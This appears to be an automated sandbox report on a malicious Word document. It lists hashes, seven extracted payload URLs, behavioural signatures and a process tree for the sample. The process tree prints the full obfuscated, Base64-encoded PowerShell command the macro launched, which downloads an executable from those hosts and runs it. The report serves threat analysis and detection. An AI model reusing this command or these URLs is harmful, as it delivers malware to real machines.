Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
14/08/2024, 15:06
Static task
static1
Behavioral task
behavioral1
Sample
969793d6e2eaec03f204154d88cb4f49_JaffaCakes118.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
969793d6e2eaec03f204154d88cb4f49_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
969793d6e2eaec03f204154d88cb4f49_JaffaCakes118.doc
-
Size
166KB
-
MD5
969793d6e2eaec03f204154d88cb4f49
-
SHA1
bf6a1029b1898730200a5baad7946f767aeb85d9
-
SHA256
f937aa80619d0e37226ade07e800da5677a6749ba0b0bc4427fc620e9b8d98b2
-
SHA512
f69c8b49468e382beca1d67eeb85537b531920b45132f9a1372a41dad79e630d10209bf014a50cedfa9dafd86655cf168d7a185dd176cc9bd8681c8eabdbec0e
-
SSDEEP
1536:pARD3bNqfNpu39IId5a6XP3Mg8afmqzdotKdz/Rek6Ef3Ei9WEvOE:OR1qf69xak3MgxmRKl/R89i9WAOE
Malware Config
Extracted
http://odeftg.com/odeftg.com/S/
http://hbprivileged.com/info/S/
http://equipamentosmix.com/10/U/
http://mianusman.com/cgi-bin/Fo/
https://www.hairlineunisexsalon.com/demo/CyD/
http://liulibug.com/wp-admin/8Aw/
https://fcbc.group/wp-includes/O/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2576 2720 POwersheLL.exe 30 -
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2576 POwersheLL.exe 6 2576 POwersheLL.exe 7 2576 POwersheLL.exe 9 2576 POwersheLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A5A68DCE-3A47-4CF3-A84B-1F8CB8649A5D}\2.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A5A68DCE-3A47-4CF3-A84B-1F8CB8649A5D}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1940 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2576 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2576 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1940 WINWORD.EXE 1940 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1940 wrote to memory of 1992 1940 WINWORD.EXE 34 PID 1940 wrote to memory of 1992 1940 WINWORD.EXE 34 PID 1940 wrote to memory of 1992 1940 WINWORD.EXE 34 PID 1940 wrote to memory of 1992 1940 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\969793d6e2eaec03f204154d88cb4f49_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABRAGsAYwBtADEAawB4AD0AKAAoACcAWgAnACsAJwB6AHAAJwApACsAJwAyADUAJwArACcAMABvACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAcgBwAFIATwBGAGkAbABFAFwARwAwAFcAcAB2AFoAQQBcAGQAVQB1ADcAYwB6AHQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBjAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAFUAUgBJAGAAVABZAFAAYABSAE8AVABvAEMAYABvAEwAIgAgAD0AIAAoACgAJwB0AGwAJwArACcAcwAxADIALAAgACcAKwAnAHQAJwApACsAJwBsAHMAJwArACcAMQAxACcAKwAoACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABZAF8AcQBsAHkAegA0ACAAPQAgACgAKAAnAFYAZwAnACsAJwAxACcAKQArACcAeQA1ACcAKwAnAGwAJwApADsAJABDAGUAZAA2AHcAMgBpAD0AKAAoACcARwByACcAKwAnADQAJwApACsAKAAnAHkAJwArACcAbwB3AHIAJwApACkAOwAkAFUAZQA0AF8AZgBsAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAOQBJACcAKwAoACcAawAnACsAJwBHADAAJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwB2AHoAJwApACsAJwBhACcAKwAoACcAOQBJAGsAJwArACcARAB1AHUANwAnACsAJwBjAHoAdAA5AEkAawAnACkAKQAgACAALQBjAFIARQBwAEwAQQBDAEUAIAAoAFsAQwBoAEEAUgBdADUANwArAFsAQwBoAEEAUgBdADcAMwArAFsAQwBoAEEAUgBdADEAMAA3ACkALABbAEMAaABBAFIAXQA5ADIAKQArACQAWQBfAHEAbAB5AHoANAArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQAWQBsAGMAcQA4AGsAagA9ACgAJwBFAGcAJwArACgAJwBsAGMANwBfACcAKwAnADcAJwApACkAOwAkAEMAbwA5ADcAcQB0AGsAPQAuACgAJwBuACcAKwAnAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAEIAQwBsAGkAZQBuAFQAOwAkAFcAZABnAG4AMgBrAGoAPQAoACcAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoALwAnACkAKwAnAC8AbwAnACsAJwBkAGUAJwArACgAJwBmACcAKwAnAHQAZwAnACkAKwAnAC4AYwAnACsAJwBvAG0AJwArACgAJwAvACcAKwAnAG8AZABlACcAKQArACgAJwBmAHQAZwAnACsAJwAuAGMAbwBtAC8AJwApACsAKAAnAFMAJwArACcALwAqACcAKQArACgAJwBoAHQAdAAnACsAJwBwACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAGgAYgAnACsAJwBwACcAKwAoACcAcgBpACcAKwAnAHYAJwApACsAKAAnAGkAbAAnACsAJwBlACcAKQArACgAJwBnACcAKwAnAGUAZAAnACkAKwAnAC4AYwAnACsAKAAnAG8AbQAvACcAKwAnAGkAJwApACsAKAAnAG4AZgAnACsAJwBvACcAKQArACgAJwAvACcAKwAnAFMALwAqACcAKQArACcAaAAnACsAJwB0ACcAKwAoACcAdABwACcAKwAnADoALwAvAGUAcQAnACkAKwAnAHUAJwArACcAaQAnACsAJwBwACcAKwAoACcAYQBtAGUAJwArACcAbgAnACkAKwAoACcAdABvACcAKwAnAHMAbQBpACcAKQArACcAeAAnACsAJwAuAGMAJwArACgAJwBvACcAKwAnAG0ALwAxACcAKQArACgAJwAwACcAKwAnAC8AVQAnACkAKwAnAC8AJwArACcAKgBoACcAKwAoACcAdAAnACsAJwB0ACcAKwAnAHAAOgAvAC8AbQBpACcAKQArACgAJwBhAG4AdQBzACcAKwAnAG0AYQAnACkAKwAoACcAbgAuACcAKwAnAGMAJwApACsAJwBvACcAKwAoACcAbQAnACsAJwAvAGMAZwBpACcAKQArACcALQBiACcAKwAnAGkAJwArACgAJwBuAC8ARgBvACcAKwAnAC8AJwApACsAJwAqACcAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcABzADoAJwArACcALwAnACkAKwAnAC8AdwAnACsAJwB3AHcAJwArACgAJwAuAGgAJwArACcAYQBpAHIAbABpAG4AZQB1AG4AaQAnACsAJwBzAGUAeABzACcAKQArACgAJwBhAGwAJwArACcAbwBuAC4AJwApACsAJwBjACcAKwAoACcAbwBtAC8AJwArACcAZAAnACsAJwBlAG0AJwApACsAKAAnAG8ALwBDAHkAJwArACcARAAnACsAJwAvACoAJwApACsAJwBoAHQAJwArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAGwAaQB1ACcAKwAnAGwAaQAnACkAKwAnAGIAJwArACgAJwB1AGcALgAnACsAJwBjAG8AJwApACsAJwBtAC8AJwArACgAJwB3AHAAJwArACcALQBhAGQAJwArACcAbQBpAG4ALwAnACkAKwAoACcAOABBAHcAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwAHMAOgAnACsAJwAvAC8AJwApACsAJwBmACcAKwAoACcAYwBiAGMALgAnACsAJwBnACcAKQArACcAcgBvACcAKwAoACcAdQBwACcAKwAnAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBpACcAKwAnAG4AYwBsAHUAJwApACsAKAAnAGQAZQBzACcAKwAnAC8ATwAnACsAJwAvACcAKQApAC4AIgBTAFAAYABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEkAaABfAGgAeABwAGIAPQAoACgAJwBUACcAKwAnAGkAZgBrACcAKQArACgAJwBiACcAKwAnAGsAXwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFkAdwBhADAAdwBxADIAIABpAG4AIAAkAFcAZABnAG4AMgBrAGoAKQB7AHQAcgB5AHsAJABDAG8AOQA3AHEAdABrAC4AIgBkAE8AYAB3AE4AYABsAE8AQQBEAEYAaQBsAEUAIgAoACQAWQB3AGEAMAB3AHEAMgAsACAAJABVAGUANABfAGYAbABlACkAOwAkAEoAYgAzAG4AMwA2AGcAPQAoACcAVwBnACcAKwAoACcAegBxAHEAJwArACcAZwAnACkAKwAnAHUAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFUAZQA0AF8AZgBsAGUAKQAuACIAbABgAEUAYABOAGcAdABIACIAIAAtAGcAZQAgADIANQA3ADYANAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACgAJABVAGUANABfAGYAbABlACkAOwAkAFoAbQBnAHgAagBzAHQAPQAoACcARwAxACcAKwAoACcAeQBmACcAKwAnAF8AJwApACsAJwA2ADgAJwApADsAYgByAGUAYQBrADsAJABSADEANQBpAHMAYgByAD0AKAAoACcARQBtAHEAJwArACcAMgB3ACcAKQArACcAbgB1ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwB6AGMAMAA1AGEAZAA9ACgAKAAnAEYAZAB0ACcAKwAnAGYAJwApACsAJwBzACcAKwAnAHkANwAnACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD580d487651b36e61846a5ff52f6f5426f
SHA198e15222b51b8f0085bf22a78cd12e86ab702f13
SHA256b4e118c384e0678c2cca861dd7f4b52053cf06934453e0334e06d661e4609b59
SHA512c909438bba7a8fca2ff4ccd004b3deac7a4fa1489d0b1e42e1bd41a02383edad996515a22e803e7e4a847ea3f7db89e3dff281a84883b54560df84a0d426676a